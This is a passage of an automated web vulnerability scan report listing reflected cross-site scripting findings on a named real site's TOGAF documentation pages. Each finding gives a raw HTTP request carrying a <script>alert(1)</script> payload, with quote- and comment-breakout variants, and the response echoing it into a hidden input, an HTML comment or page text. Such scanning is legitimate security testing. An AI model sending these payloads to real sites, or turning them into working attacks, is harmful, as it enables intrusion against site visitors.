Cookie: __utmz=30649185.1298915328.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=TOGAF; __utma=30649185.357493113.1298915328.1298915328.1298915328.1; __utmc=30649185; __utmb=30649185.5.10.1298915328

Response

HTTP/1.1 404 Not Found
Date: Mon, 28 Feb 2011 17:51:29 GMT
Server: Apache/1.3.37 (Unix) PHP/4.4.4
Content-Type: text/html
Content-Length: 5249

<html>
<head>
<title>Not found</title>
<link rel="stylesheet" href="https://www.opengroup.org/stylesheets/info1.css">
</head>
<link href="/stylesheets2/opengroup.css" rel="stylesheet" type="text/css">
...[SNIP]...
<!-- re_url = /architectureb44de--><script>alert(1)</script>bcb67e2a8d5/togaf8-doc/arch/toc2.html -->
...[SNIP]...

3.141. http://www.opengroup.org/architecture/togaf8-doc/arch/toc2.html [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.opengroup.org
Path:   /architecture/togaf8-doc/arch/toc2.html

Request

GET /architecture3e36c"><script>alert(1)</script>e067f9695a3/togaf8-doc/arch/toc2.html HTTP/1.1
Host: www.opengroup.org
Proxy-Connection: keep-alive
Referer: http://www.opengroup.org/architecture/togaf8-doc/arch/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=30649185.1298915328.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=TOGAF; __utma=30649185.357493113.1298915328.1298915328.1298915328.1; __utmc=30649185; __utmb=30649185.5.10.1298915328

Response

HTTP/1.1 404 Not Found
Date: Mon, 28 Feb 2011 17:51:23 GMT
Server: Apache/1.3.37 (Unix) PHP/4.4.4
Content-Type: text/html
Content-Length: 5246

<html>
<head>
<title>Not found</title>
<link rel="stylesheet" href="https://www.opengroup.org/stylesheets/info1.css">
</head>
<link href="/stylesheets2/opengroup.css" rel="stylesheet" type="text/css">
...[SNIP]...
<input type=hidden name=lost value="/architecture3e36c"><script>alert(1)</script>e067f9695a3/togaf8-doc/arch/toc2.html">
...[SNIP]...

3.142. http://www.opengroup.org/architecture/togaf8-doc/arch/toc2.html [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.opengroup.org
Path:   /architecture/togaf8-doc/arch/toc2.html

Request

GET /architecture11be1<script>alert(1)</script>3e620815dc4/togaf8-doc/arch/toc2.html HTTP/1.1
Host: www.opengroup.org
Proxy-Connection: keep-alive
Referer: http://www.opengroup.org/architecture/togaf8-doc/arch/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=30649185.1298915328.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=TOGAF; __utma=30649185.357493113.1298915328.1298915328.1298915328.1; __utmc=30649185; __utmb=30649185.5.10.1298915328

Response

HTTP/1.1 404 Not Found
Date: Mon, 28 Feb 2011 17:51:24 GMT
Server: Apache/1.3.37 (Unix) PHP/4.4.4
Content-Type: text/html
Content-Length: 5240

<html>
<head>
<title>Not found</title>
<link rel="stylesheet" href="https://www.opengroup.org/stylesheets/info1.css">
</head>
<link href="/stylesheets2/opengroup.css" rel="stylesheet" type="text/css">
...[SNIP]...
<br>
http://www.opengroup.org/architecture11be1<script>alert(1)</script>3e620815dc4/togaf8-doc/arch/toc2.html<br>
...[SNIP]...

3.143. http://www.opengroup.org/architecture/togaf8-doc/arch/toc2.html [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.opengroup.org
Path:   /architecture/togaf8-doc/arch/toc2.html

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /architecture/togaf8-doc9e1f5--><script>alert(1)</script>b71016c3570/arch/toc2.html HTTP/1.1
Host: www.opengroup.org
Proxy-Connection: keep-alive
Referer: http://www.opengroup.org/architecture/togaf8-doc/arch/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=30649185.1298915328.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=TOGAF; __utma=30649185.357493113.1298915328.1298915328.1298915328.1; __utmc=30649185; __utmb=30649185.5.10.1298915328

Response

HTTP/1.1 404 Not Found
Date: Mon, 28 Feb 2011 17:51:55 GMT
Server: Apache/1.3.37 (Unix) PHP/4.4.4
Content-Type: text/html
Content-Length: 5249

<html>
<head>
<title>Not found</title>
<link rel="stylesheet" href="https://www.opengroup.org/stylesheets/info1.css">
</head>
<link href="/stylesheets2/opengroup.css" rel="stylesheet" type="text/css">
...[SNIP]...
<!-- re_url = /architecture/togaf8-doc9e1f5--><script>alert(1)</script>b71016c3570/arch/toc2.html -->
...[SNIP]...

3.144. http://www.opengroup.org/architecture/togaf8-doc/arch/toc2.html [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.opengroup.org
Path:   /architecture/togaf8-doc/arch/toc2.html

Request

GET /architecture/togaf8-doca7e1c<script>alert(1)</script>1741215fdf5/arch/toc2.html HTTP/1.1
Host: www.opengroup.org
Proxy-Connection: keep-alive
Referer: http://www.opengroup.org/architecture/togaf8-doc/arch/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=30649185.1298915328.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=TOGAF; __utma=30649185.357493113.1298915328.1298915328.1298915328.1; __utmc=30649185; __utmb=30649185.5.10.1298915328

Response

HTTP/1.1 404 Not Found
Date: Mon, 28 Feb 2011 17:51:50 GMT
Server: Apache/1.3.37 (Unix) PHP/4.4.4
Content-Type: text/html
Content-Length: 5240

<html>
<head>
<title>Not found</title>
<link rel="stylesheet" href="https://www.opengroup.org/stylesheets/info1.css">
</head>
<link href="/stylesheets2/opengroup.css" rel="stylesheet" type="text/css">
...[SNIP]...
<br>
http://www.opengroup.org/architecture/togaf8-doca7e1c<script>alert(1)</script>1741215fdf5/arch/toc2.html<br>
...[SNIP]...

3.145. http://www.opengroup.org/architecture/togaf8-doc/arch/toc2.html [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.opengroup.org
Path:   /architecture/togaf8-doc/arch/toc2.html

Request

GET /architecture/togaf8-doc21311"><script>alert(1)</script>f9f7ddebf6/arch/toc2.html HTTP/1.1
Host: www.opengroup.org
Proxy-Connection: keep-alive
Referer: http://www.opengroup.org/architecture/togaf8-doc/arch/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=30649185.1298915328.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=TOGAF; __utma=30649185.357493113.1298915328.1298915328.1298915328.1; __utmc=30649185; __utmb=30649185.5.10.1298915328

Response

HTTP/1.1 404 Not Found
Date: Mon, 28 Feb 2011 17:51:42 GMT
Server: Apache/1.3.37 (Unix) PHP/4.4.4
Content-Type: text/html
Content-Length: 5243

<html>
<head>
<title>Not found</title>
<link rel="stylesheet" href="https://www.opengroup.org/stylesheets/info1.css">
</head>
<link href="/stylesheets2/opengroup.css" rel="stylesheet" type="text/css">
...[SNIP]...
<input type=hidden name=lost value="/architecture/togaf8-doc21311"><script>alert(1)</script>f9f7ddebf6/arch/toc2.html">
...[SNIP]...

3.146. http://www.opengroup.org/architecture/togaf8-doc/arch/toc2.html [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.opengroup.org
Path:   /architecture/togaf8-doc/arch/toc2.html

Request

GET /architecture/togaf8-doc/arch9a39f<script>alert(1)</script>f8f8cdf717/toc2.html HTTP/1.1
Host: www.opengroup.org
Proxy-Connection: keep-alive
Referer: http://www.opengroup.org/architecture/togaf8-doc/arch/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=30649185.1298915328.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=TOGAF; __utma=30649185.357493113.1298915328.1298915328.1298915328.1; __utmc=30649185; __utmb=30649185.5.10.1298915328

Response

HTTP/1.1 404 Not Found
Date: Mon, 28 Feb 2011 17:52:07 GMT
Server: Apache/1.3.37 (Unix) PHP/4.4.4
Content-Type: text/html
Content-Length: 5237

<html>
<head>
<title>Not found</title>
<link rel="stylesheet" href="https://www.opengroup.org/stylesheets/info1.css">
</head>
<link href="/stylesheets2/opengroup.css" rel="stylesheet" type="text/css">
...[SNIP]...
<br>
http://www.opengroup.org/architecture/togaf8-doc/arch9a39f<script>alert(1)</script>f8f8cdf717/toc2.html<br>
...[SNIP]...

3.147. http://www.opengroup.org/architecture/togaf8-doc/arch/toc2.html [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.opengroup.org
Path:   /architecture/togaf8-doc/arch/toc2.html

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /architecture/togaf8-doc/archc8177--><script>alert(1)</script>3a4b97807fc/toc2.html HTTP/1.1
Host: www.opengroup.org
Proxy-Connection: keep-alive
Referer: http://www.opengroup.org/architecture/togaf8-doc/arch/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=30649185.1298915328.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=TOGAF; __utma=30649185.357493113.1298915328.1298915328.1298915328.1; __utmc=30649185; __utmb=30649185.5.10.1298915328

Response

HTTP/1.1 404 Not Found
Date: Mon, 28 Feb 2011 17:52:09 GMT
Server: Apache/1.3.37 (Unix) PHP/4.4.4
Content-Type: text/html
Content-Length: 5249

<html>
<head>
<title>Not found</title>
<link rel="stylesheet" href="https://www.opengroup.org/stylesheets/info1.css">
</head>
<link href="/stylesheets2/opengroup.css" rel="stylesheet" type="text/css">
...[SNIP]...
<!-- re_url = /architecture/togaf8-doc/archc8177--><script>alert(1)</script>3a4b97807fc/toc2.html -->
...[SNIP]...

3.148. http://www.opengroup.org/architecture/togaf8-doc/arch/toc2.html [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.opengroup.org
Path:   /architecture/togaf8-doc/arch/toc2.html

Request

GET /architecture/togaf8-doc/arch7288b"><script>alert(1)</script>23296fabe27/toc2.html HTTP/1.1
Host: www.opengroup.org
Proxy-Connection: keep-alive
Referer: http://www.opengroup.org/architecture/togaf8-doc/arch/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=30649185.1298915328.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=TOGAF; __utma=30649185.357493113.1298915328.1298915328.1298915328.1; __utmc=30649185; __utmb=30649185.5.10.1298915328

Response

HTTP/1.1 404 Not Found
Date: Mon, 28 Feb 2011 17:52:05 GMT
Server: Apache/1.3.37 (Unix) PHP/4.4.4
Content-Type: text/html
Content-Length: 5246

<html>
<head>
<title>Not found</title>
<link rel="stylesheet" href="https://www.opengroup.org/stylesheets/info1.css">
</head>
<link href="/stylesheets2/opengroup.css" rel="stylesheet" type="text/css">
...[SNIP]...
<input type=hidden name=lost value="/architecture/togaf8-doc/arch7288b"><script>alert(1)</script>23296fabe27/toc2.html">
...[SNIP]...

3.149. http://www.opengroup.org/architecture/togaf8-doc/arch/toc2.html [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.opengroup.org
Path:   /architecture/togaf8-doc/arch/toc2.html

Request

GET /architecture/togaf8-doc/arch/toc2.html3d10a"><script>alert(1)</script>69f209beaf5 HTTP/1.1
Host: www.opengroup.org
Proxy-Connection: keep-alive
Referer: http://www.opengroup.org/architecture/togaf8-doc/arch/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=30649185.1298915328.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=TOGAF; __utma=30649185.357493113.1298915328.1298915328.1298915328.1; __utmc=30649185; __utmb=30649185.5.10.1298915328

Response

HTTP/1.1 404 Not Found
Date: Mon, 28 Feb 2011 17:52:17 GMT
Server: Apache/1.3.37 (Unix) PHP/4.4.4
Content-Type: text/html
Content-Length: 5246

<html>
<head>
<title>Not found</title>
<link rel="stylesheet" href="https://www.opengroup.org/stylesheets/info1.css">
</head>
<link href="/stylesheets2/opengroup.css" rel="stylesheet" type="text/css">
...[SNIP]...
<input type=hidden name=lost value="/architecture/togaf8-doc/arch/toc2.html3d10a"><script>alert(1)</script>69f209beaf5">
...[SNIP]...

3.150. http://www.opengroup.org/architecture/togaf8-doc/arch/toc2.html [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.opengroup.org
Path:   /architecture/togaf8-doc/arch/toc2.html

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /architecture/togaf8-doc/arch/toc2.html45f60--><script>alert(1)</script>50e39303b85 HTTP/1.1
Host: www.opengroup.org
Proxy-Connection: keep-alive
Referer: http://www.opengroup.org/architecture/togaf8-doc/arch/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=30649185.1298915328.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=TOGAF; __utma=30649185.357493113.1298915328.1298915328.1298915328.1; __utmc=30649185; __utmb=30649185.5.10.1298915328

Response

HTTP/1.1 404 Not Found
Date: Mon, 28 Feb 2011 17:52:22 GMT
Server: Apache/1.3.37 (Unix) PHP/4.4.4
Content-Type: text/html
Content-Length: 5249

<html>
<head>
<title>Not found</title>
<link rel="stylesheet" href="https://www.opengroup.org/stylesheets/info1.css">
</head>
<link href="/stylesheets2/opengroup.css" rel="stylesheet" type="text/css">
...[SNIP]...
<!-- re_url = /architecture/togaf8-doc/arch/toc2.html45f60--><script>alert(1)</script>50e39303b85 -->
...[SNIP]...

3.151. http://www.opengroup.org/architecture/togaf8-doc/arch/toc2.html [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.opengroup.org
Path:   /architecture/togaf8-doc/arch/toc2.html

Request

GET /architecture/togaf8-doc/arch/toc2.htmlc201c<script>alert(1)</script>1e4c0cf0ddd HTTP/1.1
Host: www.opengroup.org
Proxy-Connection: keep-alive
Referer: http://www.opengroup.org/architecture/togaf8-doc/arch/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=30649185.1298915328.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=TOGAF; __utma=30649185.357493113.1298915328.1298915328.1298915328.1; __utmc=30649185; __utmb=30649185.5.10.1298915328

Response

HTTP/1.1 404 Not Found
Date: Mon, 28 Feb 2011 17:52:19 GMT
Server: Apache/1.3.37 (Unix) PHP/4.4.4
Content-Type: text/html
Content-Length: 5240

<html>
<head>
<title>Not found</title>
<link rel="stylesheet" href="https://www.opengroup.org/stylesheets/info1.css">
</head>
<link href="/stylesheets2/opengroup.css" rel="stylesheet" type="text/css">
...[SNIP]...
<br>
http://www.opengroup.org/architecture/togaf8-doc/arch/toc2.htmlc201c<script>alert(1)</script>1e4c0cf0ddd<br>
...[SNIP]...

3.152. http://www.opengroup.org/architecture/togaf8-doc/arch/welcome.html [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.opengroup.org
Path:   /architecture/togaf8-doc/arch/welcome.html

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /architecture7c3a5--><script>alert(1)</script>63e2aa5d122/togaf8-doc/arch/welcome.html HTTP/1.1
Host: www.opengroup.org
Proxy-Connection: keep-alive
Referer: http://www.opengroup.org/architecture/togaf8-doc/arch/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=30649185.1298915328.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=TOGAF; __utma=30649185.357493113.1298915328.1298915328.1298915328.1; __utmc=30649185; __utmb=30649185.5.10.1298915328

Response

HTTP/1.1 404 Not Found
Date: Mon, 28 Feb 2011 17:52:04 GMT
Server: Apache/1.3.37 (Unix) PHP/4.4.4
Content-Type: text/html
Content-Length: 5258

<html>
<head>
<title>Not found</title>
<link rel="stylesheet" href="https://www.opengroup.org/stylesheets/info1.css">
</head>
<link href="/stylesheets2/opengroup.css" rel="stylesheet" type="text/css">
...[SNIP]...
<!-- re_url = /architecture7c3a5--><script>alert(1)</script>63e2aa5d122/togaf8-doc/arch/welcome.html -->
...[SNIP]...

3.153. http://www.opengroup.org/architecture/togaf8-doc/arch/welcome.html [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.opengroup.org
Path:   /architecture/togaf8-doc/arch/welcome.html

Request

GET /architecture8a706<script>alert(1)</script>4139a5bd8a2/togaf8-doc/arch/welcome.html HTTP/1.1
Host: www.opengroup.org
Proxy-Connection: keep-alive
Referer: http://www.opengroup.org/architecture/togaf8-doc/arch/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=30649185.1298915328.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=TOGAF; __utma=30649185.357493113.1298915328.1298915328.1298915328.1; __utmc=30649185; __utmb=30649185.5.10.1298915328

Response

HTTP/1.1 404 Not Found
Date: Mon, 28 Feb 2011 17:52:01 GMT
Server: Apache/1.3.37 (Unix) PHP/4.4.4
Content-Type: text/html
Content-Length: 5249

<html>
<head>
<title>Not found</title>
<link rel="stylesheet" href="https://www.opengroup.org/stylesheets/info1.css">
</head>
<link href="/stylesheets2/opengroup.css" rel="stylesheet" type="text/css">
...[SNIP]...
<br>
http://www.opengroup.org/architecture8a706<script>alert(1)</script>4139a5bd8a2/togaf8-doc/arch/welcome.html<br>
...[SNIP]...

3.154. http://www.opengroup.org/architecture/togaf8-doc/arch/welcome.html [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.opengroup.org
Path:   /architecture/togaf8-doc/arch/welcome.html

Request

GET /architecture1879c"><script>alert(1)</script>f5899df6f60/togaf8-doc/arch/welcome.html HTTP/1.1
Host: www.opengroup.org
Proxy-Connection: keep-alive
Referer: http://www.opengroup.org/architecture/togaf8-doc/arch/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=30649185.1298915328.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=TOGAF; __utma=30649185.357493113.1298915328.1298915328.1298915328.1; __utmc=30649185; __utmb=30649185.5.10.1298915328

Response

HTTP/1.1 404 Not Found
Date: Mon, 28 Feb 2011 17:51:59 GMT
Server: Apache/1.3.37 (Unix) PHP/4.4.4
Content-Type: text/html
Content-Length: 5255

<html>
<head>
<title>Not found</title>
<link rel="stylesheet" href="https://www.opengroup.org/stylesheets/info1.css">
</head>
<link href="/stylesheets2/opengroup.css" rel="stylesheet" type="text/css">
...[SNIP]...
<input type=hidden name=lost value="/architecture1879c"><script>alert(1)</script>f5899df6f60/togaf8-doc/arch/welcome.html">
...[SNIP]...

3.155. http://www.opengroup.org/architecture/togaf8-doc/arch/welcome.html [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.opengroup.org
Path:   /architecture/togaf8-doc/arch/welcome.html

Request

GET /architecture/togaf8-doc9ae1c<script>alert(1)</script>3bd409f1f54/arch/welcome.html HTTP/1.1
Host: www.opengroup.org
Proxy-Connection: keep-alive
Referer: http://www.opengroup.org/architecture/togaf8-doc/arch/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=30649185.1298915328.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=TOGAF; __utma=30649185.357493113.1298915328.1298915328.1298915328.1; __utmc=30649185; __utmb=30649185.5.10.1298915328

Response

HTTP/1.1 404 Not Found
Date: Mon, 28 Feb 2011 17:52:16 GMT
Server: Apache/1.3.37 (Unix) PHP/4.4.4
Content-Type: text/html
Content-Length: 5249

<html>
<head>
<title>Not found</title>
<link rel="stylesheet" href="https://www.opengroup.org/stylesheets/info1.css">
</head>
<link href="/stylesheets2/opengroup.css" rel="stylesheet" type="text/css">
...[SNIP]...
<br>
http://www.opengroup.org/architecture/togaf8-doc9ae1c<script>alert(1)</script>3bd409f1f54/arch/welcome.html<br>
...[SNIP]...

3.156. http://www.opengroup.org/architecture/togaf8-doc/arch/welcome.html [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.opengroup.org
Path:   /architecture/togaf8-doc/arch/welcome.html

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /architecture/togaf8-docf63af--><script>alert(1)</script>21768ec9add/arch/welcome.html HTTP/1.1
Host: www.opengroup.org
Proxy-Connection: keep-alive
Referer: http://www.opengroup.org/architecture/togaf8-doc/arch/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=30649185.1298915328.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=TOGAF; __utma=30649185.357493113.1298915328.1298915328.1298915328.1; __utmc=30649185; __utmb=30649185.5.10.1298915328

Response

HTTP/1.1 404 Not Found
Date: Mon, 28 Feb 2011 17:52:19 GMT
Server: Apache/1.3.37 (Unix) PHP/4.4.4
Content-Type: text/html
Content-Length: 5258

<html>
<head>
<title>Not found</title>
<link rel="stylesheet" href="https://www.opengroup.org/stylesheets/info1.css">
</head>
<link href="/stylesheets2/opengroup.css" rel="stylesheet" type="text/css">
...[SNIP]...
<!-- re_url = /architecture/togaf8-docf63af--><script>alert(1)</script>21768ec9add/arch/welcome.html -->
...[SNIP]...

3.157. http://www.opengroup.org/architecture/togaf8-doc/arch/welcome.html [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.opengroup.org
Path:   /architecture/togaf8-doc/arch/welcome.html

Request

GET /architecture/togaf8-doc900bf"><script>alert(1)</script>c420b677f70/arch/welcome.html HTTP/1.1
Host: www.opengroup.org
Proxy-Connection: keep-alive
Referer: http://www.opengroup.org/architecture/togaf8-doc/arch/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=30649185.1298915328.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=TOGAF; __utma=30649185.357493113.1298915328.1298915328.1298915328.1; __utmc=30649185; __utmb=30649185.5.10.1298915328

Response

HTTP/1.1 404 Not Found
Date: Mon, 28 Feb 2011 17:52:13 GMT
Server: Apache/1.3.37 (Unix) PHP/4.4.4
Content-Type: text/html
Content-Length: 5255

<html>
<head>
<title>Not found</title>
<link rel="stylesheet" href="https://www.opengroup.org/stylesheets/info1.css">
</head>
<link href="/stylesheets2/opengroup.css" rel="stylesheet" type="text/css">
...[SNIP]...
<input type=hidden name=lost value="/architecture/togaf8-doc900bf"><script>alert(1)</script>c420b677f70/arch/welcome.html">
...[SNIP]...

3.158. http://www.opengroup.org/architecture/togaf8-doc/arch/welcome.html [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.opengroup.org
Path:   /architecture/togaf8-doc/arch/welcome.html

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /architecture/togaf8-doc/archf2eb2--><script>alert(1)</script>ee53edf7a8a/welcome.html HTTP/1.1
Host: www.opengroup.org
Proxy-Connection: keep-alive
Referer: http://www.opengroup.org/architecture/togaf8-doc/arch/
